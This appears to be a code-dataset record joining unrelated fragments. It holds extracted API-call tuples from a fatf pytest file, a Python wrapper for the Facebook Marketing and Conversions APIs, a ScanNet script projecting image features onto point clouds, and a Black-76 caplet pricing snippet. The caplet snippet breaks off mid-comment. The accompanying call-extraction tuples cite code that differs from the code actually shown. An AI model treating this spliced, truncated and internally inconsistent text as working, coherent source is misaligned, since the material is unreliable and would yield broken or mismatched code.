{'abs': '(0.001)'}), '([1, 1, 2 / 3], abs=0.001)\n', (8450, 8476), False, 'import pytest\n'), ((8519, 8544), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (8531, 8544), False, 'import pytest\n'), ((8573, 8719), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS'], {'labels': '[0, 1, 2]', 'metric': '"""true negative rate"""', 'strict': '(True)'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, labels=[0, 1, 2], metric='true negative rate', strict=True)\n", (8610, 8719), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((8898, 8941), 'pytest.approx', 'pytest.approx', (['[0, 1 / 3, 3 / 4]'], {'abs': '(0.001)'}), '([0, 1 / 3, 3 / 4], abs=0.001)\n', (8911, 8941), False, 'import pytest\n'), ((9113, 9138), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (9125, 9138), False, 'import pytest\n'), ((9167, 9325), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS'], {'labels': '[0, 1, 2]', 'metric': '"""true negative rate"""', 'metric_function': 'one'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, labels=[0, 1, 2], metric='true negative rate',\n metric_function=one)\n", (9204, 9325), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((9553, 9578), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (9565, 9578), False, 'import pytest\n'), ((9607, 9768), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS', '(3)'], {'labels': '[0, 1, 2]', 'metric': '"""true negative rate"""', 'metric_function': 'two'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, 3, labels=[0, 1, 2], metric='true negative rate',\n metric_function=two)\n", (9644, 
9768), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((10022, 10047), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (10034, 10047), False, 'import pytest\n'), ((10076, 10247), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS', '(3)'], {'labels': '[0, 1, 2]', 'metric': '"""true negative rate"""', 'metric_function': 'two', 'three': '(-6)'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, 3, labels=[0, 1, 2], metric='true negative rate',\n metric_function=two, three=-6)\n", (10113, 10247), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n')] |
"""Facebook API"""
import os
import json
import logging
import pandas as pd
import time
import numpy as np
from datetime import datetime
from facebook_business.api import FacebookAdsApi
from facebook_business.adobjects.adaccount import AdAccount
from facebook_business.adobjects.serverside.event import Event
from facebook_business.adobjects.serverside.event_request import EventRequest
from facebook_business.adobjects.serverside.user_data import UserData
from facebook_business.adobjects.serverside.custom_data import CustomData
from facebook_business.exceptions import FacebookRequestError
def transform_campaign_budget(campaigns):
    """
    Normalise the budget fields of a get_campaigns response.

    Each campaign carries either a ``lifetime_budget`` or a ``daily_budget``
    key; whichever is present is folded into a single ``budget`` key with a
    companion ``budget_type`` key recording which one it was (lifetime takes
    precedence when both are present).

    Returns a DataFrame with ``id``/``name`` renamed to
    ``campaign_id``/``campaign_name``.
    """
    records = []
    for campaign in campaigns:
        record = dict(campaign)
        # Check lifetime first to keep the original precedence.
        for budget_type in ("lifetime_budget", "daily_budget"):
            if budget_type in record:
                record["budget"] = record.pop(budget_type)
                record["budget_type"] = budget_type
                break
        records.append(record)
    return pd.DataFrame(records).rename(
        columns={"id": "campaign_id", "name": "campaign_name"}
    )
def build_predicted_revenue_events(df, event_name):
    """
    Creates a list of Facebook Event objects which can be pushed to the Facebook Conversions API.
    Also creates DataFrame for logging which can be used to stream insert to a BigQuery log table.

    :param df: A DataFrame with the events to build Facebook events for
    :type df: pd.DataFrame
    :param event_name: The Facebook event name to attach to every event
    :type event_name: str
    Returns: A tuple with a list of Facebook events and a DataFrame for logs
    rtype: (list of Event, pd.DataFrame)
    """
    events = []
    logs = []
    for _, row in df.iterrows():
        # Event time is the source date ('YYYYMMDD') as a unix timestamp.
        event_time = int(
            time.mktime(datetime.strptime(row['date'], '%Y%m%d').timetuple()))
        events.append(
            Event(
                event_name=event_name,
                event_time=event_time,
                user_data=UserData(
                    country_code=row['shop'],
                    fbp=row['facebook_browser_id']
                ),
                custom_data=CustomData(
                    currency=row['currency'],
                    value=row['predicted_revenue']
                ),
                data_processing_options=[]
            )
        )
        logs.append({
            "facebook_browser_id": row['facebook_browser_id'],
            "shop": row['shop'],
            "date_source": row['date'],
            "date_processed": datetime.today().strftime('%Y-%m-%d-%H:%M:%S'),
            "predicted_revenue": row['predicted_revenue'],
            "currency": row['currency']
        })
    return events, pd.DataFrame(logs)
def calculate_batches(total_events, batch_size):
    """
    Calculate the number of batches needed to hold ``total_events`` events
    in batches of at most ``batch_size`` (integer ceiling division).

    :param total_events: The number of total events
    :type total_events: int
    :param batch_size: The max number of events in a batch
    :type batch_size: int
    Returns: The resulting number of batches
    rtype: int
    :raises ZeroDivisionError: if ``batch_size`` is 0
    :raises TypeError: if either argument is not a number
    """
    try:
        full_batches, remainder = divmod(total_events, batch_size)
    except ZeroDivisionError:
        logging.error('Batch Size cannot be 0')
        raise
    except TypeError:
        logging.error('Total Events and Batch Size must be integers')
        raise
    # A partial final batch still counts as one batch.
    return full_batches + 1 if remainder else full_batches
def split_events_to_batches(events, batch_size=1000):
    """
    Divides a DataFrame of events into batches of the specified batch size (defaults to 1000).

    :param events: A DataFrame of Facebook Events to push to the conversions API
    :type events: pd.DataFrame
    :param batch_size: The max number of events in a batch
    :type batch_size: int
    Returns: A list of DataFrames (empty when ``events`` is null/empty)
    rtype: list of pd.DataFrame
    """
    batched_df = []
    # BUG FIX: previously total_events was left unassigned when `events` was
    # null (triggering UnboundLocalError below), and `None.index` raises
    # AttributeError, which the old `except TypeError` did not catch.
    total_events = 0
    try:
        total_events = len(events.index)
    except (TypeError, AttributeError):
        logging.warning("Events is null")
    if total_events > 0:
        logging.info('Batch limit set to %s', batch_size)
        if total_events > batch_size:
            batches = calculate_batches(total_events, batch_size)
            batched_df = np.array_split(events, batches)
            logging.info('Total %s events split into %s batches', total_events, batches)
        else:
            batched_df = [events]
            logging.info('Total %s events only requires 1 batch', total_events)
    else:
        logging.warning('No events split into batches')
    return batched_df
class FacebookExecutor:
    """Thin wrapper around the Facebook Marketing and Conversions APIs.

    On construction the access token is loaded from the JSON file pointed to
    by the FACEBOOK_APPLICATION_CREDENTIALS environment variable and the
    FacebookAdsApi client is initialised. Account and pixel identifiers are
    set later via :meth:`set_account` / :meth:`set_pixel_id`.
    """
    def __init__(self):
        # API handles/identifiers; populated by set_api_config and the
        # explicit set_account / set_pixel_id calls.
        self.client = None
        self.access_token = None
        self.account = None
        self.account_id = None
        self.pixel_id = None
        self.set_api_config()
    def set_api_config(self):
        """
        Loads access_token from FACEBOOK_APPLICATION_CREDENTIALS and
        initialises the API client.
        """
        try:
            with open(os.environ["FACEBOOK_APPLICATION_CREDENTIALS"]) as facebook_cred:
                data = json.load(facebook_cred)
                self.access_token = data["access_token"]
        except KeyError:
            # NOTE(review): a missing "access_token" key in the JSON file is
            # also caught here and re-reported as a missing env variable.
            raise KeyError("FACEBOOK_APPLICATION_CREDENTIALS env variable needed")
        self.set_client()
    def set_client(self):
        """
        Sets self.client using the access token.
        """
        self.client = FacebookAdsApi.init(access_token=self.access_token)
    def set_account(self, account_id):
        """ Sets the AdAccount object for the given numeric account id.
        """
        self.account_id = account_id
        # Facebook ad account ids are prefixed with "act_".
        self.account = AdAccount('act_{}'.format(self.account_id))
        logging.info("Initiated AdAccount object for account %s", self.account_id)
    def set_pixel_id(self, pixel_id):
        """ Sets the Pixel ID used by push_conversions_api_events.
        """
        self.pixel_id = pixel_id
        logging.info("Set the pixel_id as %s", self.pixel_id)
    def get_campaign_insights(self, account_id, fields, start_date, end_date):
        """
        Fetches campaign-level insights from the Facebook Insights API.
        Parameters:
            account_id: ID associated to the Facebook Account
            fields: list of fields to be fetched
            start_date/end_date: defines the time range to get insights for (YYYY-mm-dd).
        Returns a list of dicts, one per campaign insight row.
        """
        self.set_account(account_id)
        out = []
        # Only ACTIVE campaigns, aggregated at campaign level.
        params = {
            'effective_status': ['ACTIVE'],
            'level': 'campaign',
            'time_range': {
                'since': start_date,
                'until': end_date
            }
        }
        logging.debug("Downloading insights for account %s", self.account_id)
        logging.debug("fields: %s", fields)
        logging.debug("params: %s", params)
        campaign_insights = self.account.get_insights(
            params=params,
            fields=fields
        )
        for insight in campaign_insights:
            out.append(dict(insight))
        return out
    def get_active_campaigns(self):
        """Returns the account's active, uncompleted campaigns with budget fields."""
        return self.account.get_campaigns(
            fields=['account_id', 'name', 'daily_budget', 'lifetime_budget'],
            params={
                'effective_status': ["ACTIVE"],
                'is_completed': False
            }
        )
    def get_active_campaign_budgets(self, account_id):
        """
        Fetches active campaign metadata from the Facebook API.
        Returns a dataframe with the following fields:
        - account_id
        - campaign_id
        - campaign_name
        - budget_type (daily_budget or lifetime_budget)
        - budget amount in account currency
        """
        self.set_account(account_id)
        campaigns = self.get_active_campaigns()
        out = transform_campaign_budget(campaigns)
        return out
    def update_daily_budget(self, account_id, campaign_id, new_budget):
        """
        Updates the daily budget of the matching active campaign via the
        Facebook API. Returns the list of active campaigns that was scanned.
        """
        self.set_account(account_id)
        campaigns = self.get_active_campaigns()
        for campaign in campaigns:
            if campaign.get_id() == campaign_id:
                # Lazy import keeps pygyver out of module import time.
                from pygyver.etl.toolkit import configure_logging
                configure_logging()
                logging.info(
                    "Loading new budget for campaign %s",
                    campaign_id
                )
                logging.info(
                    "Current daily_budget for campaign %s: %s",
                    campaign_id,
                    campaign['daily_budget']
                )
                # new_budget * 100: presumably the API expects minor currency
                # units (e.g. cents) — TODO confirm against Marketing API docs.
                campaign.api_update(
                    params={'daily_budget': round(new_budget*100)}
                )
                logging.info(
                    "New daily_budget for campaign %s: %s",
                    campaign_id,
                    new_budget
                )
        return campaigns
    def push_conversions_api_events(self, events, test_event_code=None):
        """
        Pushes a list of Events to the Facebook Conversions API.

        :param events: A list of Facebook Events to push to the conversions API
        :type events: list of Event
        :param test_event_code: A test_event_code from Facebook Events Manager to mark these as test events
        :type test_event_code: str
        Returns: A dictionary with the parsed response from the Facebook API
        rtype: dict[str, str]
        :raises ValueError: if more than 1,000 events are given
        """
        # Facebook rejects requests above 1,000 events; fail fast instead.
        if len(events) > 1000:
            logging.error("The maximum number of events that Facebook accepts in a single API call is 1,000. "
                          "Please use the split_events_to_batches() function to split the events into batches")
            raise ValueError
        event_request = EventRequest(
            events=events,
            pixel_id=self.pixel_id,
        )
        # Add the test_event_code if one is given
        if test_event_code:
            event_request.test_event_code = test_event_code
        api_response = {}
        try:
            event_response = event_request.execute()
            logging.info('%s events pushed to Facebook Conversions API', event_response.events_received)
            api_response['status'] = 'API Success'
            api_response['fb_trace_id'] = event_response.fbtrace_id
            api_response['messages'] = '\n'.join(event_response.messages)
            api_response['total_events'] = event_response.events_received
        except FacebookRequestError as e:
            # On API errors, fold the error + user-facing message into the
            # same response shape as the success path.
            logging.error('There was a Facebook Conversions API error:\n\t%s', e)
            api_response['status'] = 'API Error'
            api_response['fb_trace_id'] = e.body()['error']['fbtrace_id']
            error_message = e.body()['error']['message']
            error_message = ': '.join([error_message, e.body()['error']['error_user_msg']])
            api_response['messages'] = error_message
            api_response['total_events'] = None
        return api_response
| [
"pandas.DataFrame",
"logging.error",
"json.load",
"logging.debug",
"facebook_business.adobjects.serverside.custom_data.CustomData",
"datetime.datetime.today",
"logging.warning",
"facebook_business.adobjects.serverside.user_data.UserData",
"facebook_business.api.FacebookAdsApi.init",
"logging.info"... | [((2945, 2963), 'pandas.DataFrame', 'pd.DataFrame', (['logs'], {}), '(logs)\n', (2957, 2963), True, 'import pandas as pd\n'), ((2071, 2137), 'facebook_business.adobjects.serverside.user_data.UserData', 'UserData', ([], {'country_code': "row['shop']", 'fbp': "row['facebook_browser_id']"}), "(country_code=row['shop'], fbp=row['facebook_browser_id'])\n", (2079, 2137), False, 'from facebook_business.adobjects.serverside.user_data import UserData\n'), ((2195, 2263), 'facebook_business.adobjects.serverside.custom_data.CustomData', 'CustomData', ([], {'currency': "row['currency']", 'value': "row['predicted_revenue']"}), "(currency=row['currency'], value=row['predicted_revenue'])\n", (2205, 2263), False, 'from facebook_business.adobjects.serverside.custom_data import CustomData\n'), ((2315, 2438), 'facebook_business.adobjects.serverside.event.Event', 'Event', ([], {'event_name': 'event_name', 'event_time': 'date', 'user_data': 'user_data', 'custom_data': 'custom_data', 'data_processing_options': '[]'}), '(event_name=event_name, event_time=date, user_data=user_data,\n custom_data=custom_data, data_processing_options=[])\n', (2320, 2438), False, 'from facebook_business.adobjects.serverside.event import Event\n'), ((4376, 4425), 'logging.info', 'logging.info', (['"""Batch limit set to %s"""', 'batch_size'], {}), "('Batch limit set to %s', batch_size)\n", (4388, 4425), False, 'import logging\n'), ((4822, 4869), 'logging.warning', 'logging.warning', (['"""No events split into batches"""'], {}), "('No events split into batches')\n", (4837, 4869), False, 'import logging\n'), ((5765, 5816), 'facebook_business.api.FacebookAdsApi.init', 'FacebookAdsApi.init', ([], {'access_token': 'self.access_token'}), '(access_token=self.access_token)\n', (5784, 5816), False, 'from facebook_business.api import FacebookAdsApi\n'), ((6013, 6087), 'logging.info', 'logging.info', (['"""Initiated AdAccount object for account %s"""', 'self.account_id'], {}), "('Initiated AdAccount 
object for account %s', self.account_id)\n", (6025, 6087), False, 'import logging\n'), ((6210, 6263), 'logging.info', 'logging.info', (['"""Set the pixel_id as %s"""', 'self.pixel_id'], {}), "('Set the pixel_id as %s', self.pixel_id)\n", (6222, 6263), False, 'import logging\n'), ((7000, 7069), 'logging.debug', 'logging.debug', (['"""Downloading insights for account %s"""', 'self.account_id'], {}), "('Downloading insights for account %s', self.account_id)\n", (7013, 7069), False, 'import logging\n'), ((7078, 7113), 'logging.debug', 'logging.debug', (['"""fields: %s"""', 'fields'], {}), "('fields: %s', fields)\n", (7091, 7113), False, 'import logging\n'), ((7122, 7157), 'logging.debug', 'logging.debug', (['"""params: %s"""', 'params'], {}), "('params: %s', params)\n", (7135, 7157), False, 'import logging\n'), ((10107, 10158), 'facebook_business.adobjects.serverside.event_request.EventRequest', 'EventRequest', ([], {'events': 'events', 'pixel_id': 'self.pixel_id'}), '(events=events, pixel_id=self.pixel_id)\n', (10119, 10158), False, 'from facebook_business.adobjects.serverside.event_request import EventRequest\n'), ((1267, 1284), 'pandas.DataFrame', 'pd.DataFrame', (['out'], {}), '(out)\n', (1279, 1284), True, 'import pandas as pd\n'), ((3596, 3635), 'logging.error', 'logging.error', (['"""Batch Size cannot be 0"""'], {}), "('Batch Size cannot be 0')\n", (3609, 3635), False, 'import logging\n'), ((3680, 3741), 'logging.error', 'logging.error', (['"""Total Events and Batch Size must be integers"""'], {}), "('Total Events and Batch Size must be integers')\n", (3693, 3741), False, 'import logging\n'), ((4308, 4341), 'logging.warning', 'logging.warning', (['"""Events is null"""'], {}), "('Events is null')\n", (4323, 4341), False, 'import logging\n'), ((4555, 4586), 'numpy.array_split', 'np.array_split', (['events', 'batches'], {}), '(events, batches)\n', (4569, 4586), True, 'import numpy as np\n'), ((4599, 4675), 'logging.info', 'logging.info', (['"""Total %s events split 
into %s batches"""', 'total_events', 'batches'], {}), "('Total %s events split into %s batches', total_events, batches)\n", (4611, 4675), False, 'import logging\n'), ((4736, 4803), 'logging.info', 'logging.info', (['"""Total %s events only requires 1 batch"""', 'total_events'], {}), "('Total %s events only requires 1 batch', total_events)\n", (4748, 4803), False, 'import logging\n'), ((9842, 10033), 'logging.error', 'logging.error', (['"""The maximum number of events that Facebook accepts in a single API call is 1,000. Please use the split_events_to_batches() function to split the events into batches"""'], {}), "(\n 'The maximum number of events that Facebook accepts in a single API call is 1,000. Please use the split_events_to_batches() function to split the events into batches'\n )\n", (9855, 10033), False, 'import logging\n'), ((10439, 10536), 'logging.info', 'logging.info', (['"""%s events pushed to Facebook Conversions API"""', 'event_response.events_received'], {}), "('%s events pushed to Facebook Conversions API', event_response\n .events_received)\n", (10451, 10536), False, 'import logging\n'), ((5427, 5451), 'json.load', 'json.load', (['facebook_cred'], {}), '(facebook_cred)\n', (5436, 5451), False, 'import json\n'), ((8600, 8619), 'pygyver.etl.toolkit.configure_logging', 'configure_logging', ([], {}), '()\n', (8617, 8619), False, 'from pygyver.etl.toolkit import configure_logging\n'), ((8636, 8699), 'logging.info', 'logging.info', (['"""Loading new budget for campaign %s"""', 'campaign_id'], {}), "('Loading new budget for campaign %s', campaign_id)\n", (8648, 8699), False, 'import logging\n'), ((8774, 8873), 'logging.info', 'logging.info', (['"""Current daily_budget for campaign %s: %s"""', 'campaign_id', "campaign['daily_budget']"], {}), "('Current daily_budget for campaign %s: %s', campaign_id,\n campaign['daily_budget'])\n", (8786, 8873), False, 'import logging\n'), ((9086, 9163), 'logging.info', 'logging.info', (['"""New daily_budget for campaign %s: 
%s"""', 'campaign_id', 'new_budget'], {}), "('New daily_budget for campaign %s: %s', campaign_id, new_budget)\n", (9098, 9163), False, 'import logging\n'), ((10854, 10925), 'logging.error', 'logging.error', (['"""There was a Facebook Conversions API error:\n\t%s"""', 'e'], {}), '("""There was a Facebook Conversions API error:\n\t%s""", e)\n', (10867, 10925), False, 'import logging\n'), ((1996, 2036), 'datetime.datetime.strptime', 'datetime.strptime', (["row['date']", '"""%Y%m%d"""'], {}), "(row['date'], '%Y%m%d')\n", (2013, 2036), False, 'from datetime import datetime\n'), ((2752, 2768), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (2766, 2768), False, 'from datetime import datetime\n')] |
import os
import sys
import h5py
import torch
import torch.nn as nn
import argparse
import numpy as np
from tqdm import tqdm
from plyfile import PlyData, PlyElement
import math
from imageio import imread
from PIL import Image
import torchvision.transforms as transforms
sys.path.append(os.path.join(os.getcwd())) # HACK add the root folder
from lib.config import CONF
from lib.projection import ProjectionHelper
SCANNET_LIST = CONF.SCANNETV2_LIST
SCANNET_DATA = CONF.PREP_SCANS
SCANNET_FRAME_ROOT = CONF.SCANNET_FRAMES
SCANNET_FRAME_PATH = os.path.join(SCANNET_FRAME_ROOT, "{}") # name of the file
ENET_FEATURE_PATH = CONF.ENET_FEATURES_PATH
ENET_FEATURE_DATABASE = CONF.MULTIVIEW
# projection
INTRINSICS = [[37.01983, 0, 20, 0],[0, 38.52470, 15.5, 0],[0, 0, 1, 0],[0, 0, 0, 1]]
PROJECTOR = ProjectionHelper(INTRINSICS, 0.1, 4.0, [41, 32], 0.05)
def get_scene_list():
    """Read the ScanNet scene-list file and return its unique scene ids, sorted."""
    with open(SCANNET_LIST, 'r') as list_file:
        unique_ids = set(list_file.read().splitlines())
    return sorted(unique_ids)
def to_tensor(arr):
    """Wrap *arr* in a torch.Tensor and move it onto the GPU."""
    tensor = torch.Tensor(arr)
    return tensor.cuda()
def resize_crop_image(image, new_image_dims):
    """Resize *image* to the target height (keeping aspect ratio), then
    center-crop to new_image_dims ([width, height]). No-op if already sized."""
    current_dims = [image.shape[1], image.shape[0]]
    if current_dims == new_image_dims:
        return image
    target_w, target_h = new_image_dims[0], new_image_dims[1]
    # width that preserves the original aspect ratio at the target height
    scaled_w = int(math.floor(target_h * float(current_dims[0]) / float(current_dims[1])))
    pil_image = Image.fromarray(image)
    pil_image = transforms.Resize([target_h, scaled_w], interpolation=Image.NEAREST)(pil_image)
    pil_image = transforms.CenterCrop([target_h, target_w])(pil_image)
    return np.array(pil_image)
def load_image(file, image_dims):
    """Load an image file and resize/crop it to image_dims ([width, height]).

    Color (3-D) images are converted to a normalized CHW float tensor;
    2-D label images are returned as-is after resize/crop.

    Raises:
        ValueError: if the loaded image is neither 2-D nor 3-D.
    """
    image = imread(file)
    # preprocess
    image = resize_crop_image(image, image_dims)
    if len(image.shape) == 3:  # color image
        image = np.transpose(image, [2, 0, 1])  # move feature to front
        image = transforms.Normalize(mean=[0.496342, 0.466664, 0.440796], std=[0.277856, 0.28623, 0.291129])(torch.Tensor(image.astype(np.float32) / 255.0))
    elif len(image.shape) == 2:  # label image
        # label maps need no normalization
        pass
    else:
        # BUG FIX: the original used a bare `raise` with no active exception,
        # which produces a confusing RuntimeError; raise an explicit error.
        raise ValueError('unsupported image shape: {}'.format(image.shape))
    return image
def load_pose(filename):
    """Parse a 4x4 camera pose matrix from a text file of 4 space-separated rows."""
    with open(filename) as pose_file:
        rows = pose_file.read().splitlines()
    assert len(rows) == 4
    matrix = []
    for row in rows:
        tokens = row.split(" ")
        matrix.append([tokens[0], tokens[1], tokens[2], tokens[3]])
    return np.asarray(matrix).astype(np.float32)
def load_depth(file, image_dims):
    """Load a depth map, resize/crop it to image_dims, and convert mm to meters."""
    depth = imread(file)
    # preprocess
    depth = resize_crop_image(depth, image_dims)
    return depth.astype(np.float32) / 1000.0
def get_scene_data(scene_list):
    """Load the (N, 3) xyz coordinates of every scene id in *scene_list*."""
    scene_data = {}
    for scene_id in scene_list:
        npy_path = os.path.join(SCANNET_DATA, scene_id) + ".npy"
        # keep only xyz; drop any extra per-point columns
        scene_data[scene_id] = np.load(npy_path)[:, :3]
    return scene_data
def compute_projection(points, depth, camera_to_world):
    """Map point-cloud points onto image pixels for every frame.

    :param points: (num_points, 3) point cloud
    :param depth: per-frame depth maps, first axis indexes the frame
    :param camera_to_world: per-frame (4, 4) camera poses
    :return: (indices_3ds, indices_2ds) — per-frame long tensors whose first
        entry holds the number of valid correspondences and whose remaining
        entries hold the projection mapping
    """
    num_points, num_frames = points.shape[0], depth.shape[0]
    indices_3ds = torch.zeros(num_frames, num_points + 1).long().cuda()
    indices_2ds = torch.zeros(num_frames, num_points + 1).long().cuda()
    for frame_idx in range(num_frames):
        result = PROJECTOR.compute_projection(
            to_tensor(points), to_tensor(depth[frame_idx]), to_tensor(camera_to_world[frame_idx]))
        # PROJECTOR returns a falsy value when no points project into the frame
        if result:
            indices_3ds[frame_idx] = result[0].long()
            indices_2ds[frame_idx] = result[1].long()
    return indices_3ds, indices_2ds
if __name__ == "__main__":
    # Load every scene id and its (N, 3) point cloud up front.
    scene_list = get_scene_list()
    scene_data = get_scene_data(scene_list)
    with h5py.File(ENET_FEATURE_DATABASE, "w", libver="latest") as database:
        print("projecting multiview features to point cloud...")
        for scene_id in tqdm(scene_list):
            scene = scene_data[scene_id]
            # load frames
            frame_list = list(map(lambda x: x.split(".")[0], os.listdir(SCANNET_FRAME_ROOT.format(scene_id, "color"))))
            # Per-frame buffers: RGB images (CHW), low-res depth maps, 4x4 poses.
            scene_images = np.zeros((len(frame_list), 3, 256, 328))
            scene_depths = np.zeros((len(frame_list), 32, 41))
            scene_poses = np.zeros((len(frame_list), 4, 4))
            for i, frame_id in enumerate(frame_list):
                scene_images[i] = load_image(SCANNET_FRAME_PATH.format(scene_id, "color", "{}.jpg".format(frame_id)), [328, 256])
                scene_depths[i] = load_depth(SCANNET_FRAME_PATH.format(scene_id, "depth", "{}.png".format(frame_id)), [41, 32])
                scene_poses[i] = load_pose(SCANNET_FRAME_PATH.format(scene_id, "pose", "{}.txt".format(frame_id)))
            # compute projections for each chunk
            projection_3d, projection_2d = compute_projection(scene, scene_depths, scene_poses)
            # Order frames by number of valid correspondences (stored in column 0).
            _, inds = torch.sort(projection_3d[:, 0], descending=True)
            projection_3d, projection_2d = projection_3d[inds], projection_2d[inds]
            # compute valid projections
            projections = []
            for i in range(projection_3d.shape[0]):
                num_valid = projection_3d[i, 0]
                if num_valid == 0:
                    continue
                projections.append((frame_list[inds[i].long().item()], projection_3d[i], projection_2d[i]))
            # project
            # Accumulate 128-dim ENet features per point; after the first frame,
            # later frames only fill points whose feature row is still all-zero.
            point_features = to_tensor(scene).new(scene.shape[0], 128).fill_(0)
            for i, projection in enumerate(projections):
                frame_id = projection[0]
                projection_3d = projection[1]
                projection_2d = projection[2]
                feat = to_tensor(np.load(ENET_FEATURE_PATH.format(scene_id, frame_id)))
                proj_feat = PROJECTOR.project(feat, projection_3d, projection_2d, scene.shape[0]).transpose(1, 0)
                if i == 0:
                    point_features = proj_feat
                else:
                    mask = ((point_features == 0).sum(1) == 128).nonzero().squeeze(1)
                    point_features[mask] = proj_feat[mask]
            # save
            # One HDF5 dataset per scene: (num_points, 128) multiview features.
            database.create_dataset(scene_id, data=point_features.cpu().numpy())
    print("done!")
| [
"h5py.File",
"tqdm.tqdm",
"os.getcwd",
"imageio.imread",
"numpy.asarray",
"numpy.transpose",
"torch.zeros",
"torch.Tensor",
"numpy.array",
"PIL.Image.fromarray",
"torchvision.transforms.CenterCrop",
"torchvision.transforms.Normalize",
"os.path.join",
"torch.sort",
"lib.projection.Project... | [((542, 580), 'os.path.join', 'os.path.join', (['SCANNET_FRAME_ROOT', '"""{}"""'], {}), "(SCANNET_FRAME_ROOT, '{}')\n", (554, 580), False, 'import os\n'), ((795, 849), 'lib.projection.ProjectionHelper', 'ProjectionHelper', (['INTRINSICS', '(0.1)', '(4.0)', '[41, 32]', '(0.05)'], {}), '(INTRINSICS, 0.1, 4.0, [41, 32], 0.05)\n', (811, 849), False, 'from lib.projection import ProjectionHelper\n'), ((1491, 1506), 'numpy.array', 'np.array', (['image'], {}), '(image)\n', (1499, 1506), True, 'import numpy as np\n'), ((1576, 1588), 'imageio.imread', 'imread', (['file'], {}), '(file)\n', (1582, 1588), False, 'from imageio import imread\n'), ((2358, 2370), 'imageio.imread', 'imread', (['file'], {}), '(file)\n', (2364, 2370), False, 'from imageio import imread\n'), ((300, 311), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (309, 311), False, 'import os\n'), ((1292, 1378), 'torchvision.transforms.Resize', 'transforms.Resize', (['[new_image_dims[1], resize_width]'], {'interpolation': 'Image.NEAREST'}), '([new_image_dims[1], resize_width], interpolation=Image.\n NEAREST)\n', (1309, 1378), True, 'import torchvision.transforms as transforms\n'), ((1374, 1396), 'PIL.Image.fromarray', 'Image.fromarray', (['image'], {}), '(image)\n', (1389, 1396), False, 'from PIL import Image\n'), ((1410, 1471), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['[new_image_dims[1], new_image_dims[0]]'], {}), '([new_image_dims[1], new_image_dims[0]])\n', (1431, 1471), True, 'import torchvision.transforms as transforms\n'), ((1716, 1746), 'numpy.transpose', 'np.transpose', (['image', '[2, 0, 1]'], {}), '(image, [2, 0, 1])\n', (1728, 1746), True, 'import numpy as np\n'), ((3956, 4010), 'h5py.File', 'h5py.File', (['ENET_FEATURE_DATABASE', '"""w"""'], {'libver': '"""latest"""'}), "(ENET_FEATURE_DATABASE, 'w', libver='latest')\n", (3965, 4010), False, 'import h5py\n'), ((4113, 4129), 'tqdm.tqdm', 'tqdm', (['scene_list'], {}), '(scene_list)\n', (4117, 4129), False, 
'from tqdm import tqdm\n'), ((1000, 1017), 'torch.Tensor', 'torch.Tensor', (['arr'], {}), '(arr)\n', (1012, 1017), False, 'import torch\n'), ((1788, 1885), 'torchvision.transforms.Normalize', 'transforms.Normalize', ([], {'mean': '[0.496342, 0.466664, 0.440796]', 'std': '[0.277856, 0.28623, 0.291129]'}), '(mean=[0.496342, 0.466664, 0.440796], std=[0.277856, \n 0.28623, 0.291129])\n', (1808, 1885), True, 'import torchvision.transforms as transforms\n'), ((2268, 2285), 'numpy.asarray', 'np.asarray', (['lines'], {}), '(lines)\n', (2278, 2285), True, 'import numpy as np\n'), ((5104, 5152), 'torch.sort', 'torch.sort', (['projection_3d[:, 0]'], {'descending': '(True)'}), '(projection_3d[:, 0], descending=True)\n', (5114, 5152), False, 'import torch\n'), ((2655, 2691), 'os.path.join', 'os.path.join', (['SCANNET_DATA', 'scene_id'], {}), '(SCANNET_DATA, scene_id)\n', (2667, 2691), False, 'import os\n'), ((3405, 3444), 'torch.zeros', 'torch.zeros', (['num_frames', '(num_points + 1)'], {}), '(num_frames, num_points + 1)\n', (3416, 3444), False, 'import torch\n'), ((3477, 3516), 'torch.zeros', 'torch.zeros', (['num_frames', '(num_points + 1)'], {}), '(num_frames, num_points + 1)\n', (3488, 3516), False, 'import torch\n')] |
import numpy as np
from scipy.stats import norm
from dcf import dcf
def blacklet(K, F, vol, omega=1):
    """Undiscounted Black-76 payoff for strike K, forward F and total
    volatility vol. omega=+1 prices a caplet (call), omega=-1 a floorlet (put)."""
    moneyness = np.log(F / K)
    half_var = 0.5 * vol ** 2
    d1 = (moneyness + half_var) / vol
    d2 = (moneyness - half_var) / vol
    forward_leg = F * omega * norm.cdf(omega * d1)
    strike_leg = K * omega * norm.cdf(omega * d2)
    return forward_leg - strike_leg
def caplet_black(bond, forward, S, T, K, sigma, method='Act360'):
    """Black price of a caplet resetting at S and paying at T.

    :param bond: discount factor to the payment date
    :param forward: forward rate for the [S, T] period
    :param S: reset time in years
    :param T: payment time in years
    :param K: strike rate
    :param sigma: annualized Black volatility
    :param method: day-count convention forwarded to dcf()
    """
    dcf_factor = dcf(S, T, method=method)
    # total volatility accrued up to the reset date
    vol = sigma * np.sqrt(S)
    # BUG FIX: the original call blacklet(K, S, forward, vol, omega=1) passed
